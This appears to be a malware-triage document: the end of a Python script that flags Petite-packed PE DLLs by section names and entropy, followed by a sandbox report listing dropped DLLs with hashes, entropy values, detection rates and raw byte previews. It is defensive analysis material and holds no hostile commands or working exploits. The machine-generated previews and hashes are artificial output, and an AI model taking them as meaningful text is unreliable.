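    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, coff
    )
    first = coff + COFF_HEADER_SIZE + opt_size
    names = []
    for i in range(nsections):
        off = first + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(data):
            break  # truncated header table: stop rather than read past the buffer
        raw = data[off:off + 8]  # Name is the first 8 bytes, NUL padded
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes, entropy_threshold: float = 7.5) -> dict:
    """Packer triage for one dropped file: entropy plus the Petite / nameless-section checks."""
    names = pe_section_names(data)
    ent = shannon_entropy(data)
    return {
        "entropy": round(ent, 3),
        "sections": names,
        "nameless_sections": sum(1 for n in names if n == ""),
        "petite_section": any(n.lower() == "petite" for n in names),
        "high_entropy": ent >= entropy_threshold,  # threshold is an assumption, not from the report
    }


def build_sample_pe(section_names, body: bytes) -> bytes:
    """Constructed minimal PE-shaped buffer for offline testing; not a real dropped file."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, DOS_E_LFANEW_OFFSET, 64)  # e_lfanew -> right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x2102)  # i386 DLL
    sections = b"".join(
        name.encode("ascii").ljust(8, b"\0") + bytes(32) for name in section_names
    )
    return bytes(dos) + PE_SIGNATURE + coff + sections + body


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

Run it as `python triage.py <dropped.dll>` over the files recovered from the sandbox's is-*.tmp directory; a "petite" section together with an entropy near 8 bits is the combination the report flags above, whereas the unpacked helper DLLs listed earlier sit around 6.3-6.7 bits with conventional .text/.rdata/.data sections.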
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):149845
                                                                            Entropy (8bit):7.893881970959476
                                                                            Encrypted:false
                                                                            SSDEEP:3072:y0z4JQHu5EvSA/JqiK2s6g+hUCQiMVQ623hi3JKz8KQP6ZwhQrNrbZ:yUju5GY7l+CCYVQ62YUzXQiqhQrJbZ
                                                                            MD5:526E02E9EB8953655EB293D8BAC59C8F
                                                                            SHA1:7CA6025602681EF6EFDEE21CD11165A4A70AA6FE
                                                                            SHA-256:E2175E48A93B2A7FA25ACC6879F3676E04A0C11BB8CDFD8D305E35FD9B5BBBB4
                                                                            SHA-512:053EB66D17E5652A12D5F7FAF03F02F35D1E18146EE38308E39838647F91517F8A9DC0B7A7748225F2F48B8F0347B0A33215D7983E85FCA55EF8679564471F0B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):34392
                                                                            Entropy (8bit):7.81689943223162
                                                                            Encrypted:false
                                                                            SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                            MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                            SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                            SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                            SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):5960
                                                                            Entropy (8bit):5.956401374574174
                                                                            Encrypted:false
                                                                            SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                            MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                            SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                            SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                            SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):7910
                                                                            Entropy (8bit):6.931925007191986
                                                                            Encrypted:false
                                                                            SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                            MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                            SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                            SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                            SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):11532
                                                                            Entropy (8bit):7.219753259626605
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                            MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                            SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                            SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                            SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):39304
                                                                            Entropy (8bit):7.819409739152795
                                                                            Encrypted:false
                                                                            SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                            MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                            SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                            SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                            SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18966
                                                                            Entropy (8bit):7.620111275837424
                                                                            Encrypted:false
                                                                            SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                            MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                            SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                            SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                            SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8456
                                                                            Entropy (8bit):6.767152008521429
                                                                            Encrypted:false
                                                                            SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                            MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                            SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                            SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                            SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36752
                                                                            Entropy (8bit):7.780431937344781
                                                                            Encrypted:false
                                                                            SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                            MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                            SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                            SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                            SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36416
                                                                            Entropy (8bit):7.842278356440954
                                                                            Encrypted:false
                                                                            SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                            MD5:BEBA64522AA8265751187E38D1FC0653
                                                                            SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                            SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                            SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):19008
                                                                            Entropy (8bit):7.672481244971812
                                                                            Encrypted:false
                                                                            SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                            MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                            SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                            SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                            SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):68876
                                                                            Entropy (8bit):7.922125376804506
                                                                            Encrypted:false
                                                                            SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                            MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                            SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                            SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                            SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):17472
                                                                            Entropy (8bit):7.524548435291935
                                                                            Encrypted:false
                                                                            SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                            MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                            SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                            SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                            SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):35588
                                                                            Entropy (8bit):7.817557274117395
                                                                            Encrypted:false
                                                                            SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                            MD5:58521D1AC2C588B85642354F6C0C7812
                                                                            SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                            SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                            SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 text
                                                                            Category:dropped
                                                                            Size (bytes):1059
                                                                            Entropy (8bit):5.1208137218866945
                                                                            Encrypted:false
                                                                            SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                            MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                            SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                            SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                            SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                            Malicious:false
                                                                            Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):16910
                                                                            Entropy (8bit):5.289608933932413
                                                                            Encrypted:false
                                                                            SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                            MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                            SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                            SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                            SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
